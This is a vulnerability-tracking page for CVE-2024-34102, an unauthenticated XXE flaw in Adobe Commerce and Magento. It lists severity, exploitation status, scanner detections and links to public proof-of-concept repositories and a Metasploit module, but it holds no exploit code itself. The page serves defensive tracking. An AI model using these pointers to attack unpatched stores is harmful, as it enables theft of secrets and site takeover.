KEVIntel
Back to KEVs
9.8
CVSS
Critical

CVE-2024-34102

PUBLISHED

XXE can expose crypt key and other secrets granting full admin access

Exploited in the wild PoC available Remote Low complexity No user interaction
Vendor
Adobe
Product
Adobe Commerce
Published
Jun 13, 2024
EPSS

Description

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

cisa nuclei_scanner metasploit nessus_scanner

CVSS scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation status

Exploited in the wild

Recorded 2024-07-17 00:00:00 UTC · Source

Proof of concept available

Recorded 2024-06-30 16:49:26 UTC · Source

SSVC decision points

Exploitation
active
Automatable
Yes
Technical impact
total

References

Known exploited vulnerability sources

Catalogues that list this CVE as a known exploited vulnerability.

Source Added
CISA Jul 17, 2024

Scanner integrations

Scanner Reference Detected
Metasploit https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb Apr 28, 2025
Nuclei https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34102.yaml Apr 25, 2025
Nessus https://www.tenable.com/plugins/nessus/206274 Aug 28, 2024

Potential proof of concepts

These PoCs are unverified and could contain malware. Use at your own risk.

magento_xxe_to_glibc_buf_overflow

metasploit · Created Unknown

Metasploit module for CVE-2024-34102

EQSTLab/CVE-2024-34102

github · Created 2024-08-13 07:33:20 UTC · 3 stars

Adobe Commerce XXE exploit

bughuntar/CVE-2024-34102

github · Created 2024-07-13 10:25:23 UTC · 3 stars

Exploitation CVE-2024-34102

jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

github · Created 2024-07-01 08:19:28 UTC · 8 stars

CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

0x0d3ad/CVE-2024-34102

github · Created 2024-06-30 16:49:26 UTC · 2 stars

CVE-2024-34102 (Magento XXE)

Chocapikk/CVE-2024-34102

github · Created 2024-06-28 23:33:21 UTC · 47 stars

CosmicSting (CVE-2024-34102)

11whoami99/CVE-2024-34102

github · Created 2024-06-28 12:45:40 UTC · 3 stars

POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook

bigb0x/CVE-2024-34102

github · Created 2024-06-27 21:57:24 UTC · 32 stars

POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.

th3gokul/CVE-2024-34102

github · Created 2024-06-27 18:10:13 UTC · 14 stars

CVE-2024-34102: Unauthenticated Magento XXE

Timeline

  • CVE ID Reserved

  • CVE Published to Public

  • Proof of Concept Exploit Available

  • Added to KEVIntel

  • Detected by Nessus

  • Detected by Nuclei

  • Detected by Metasploit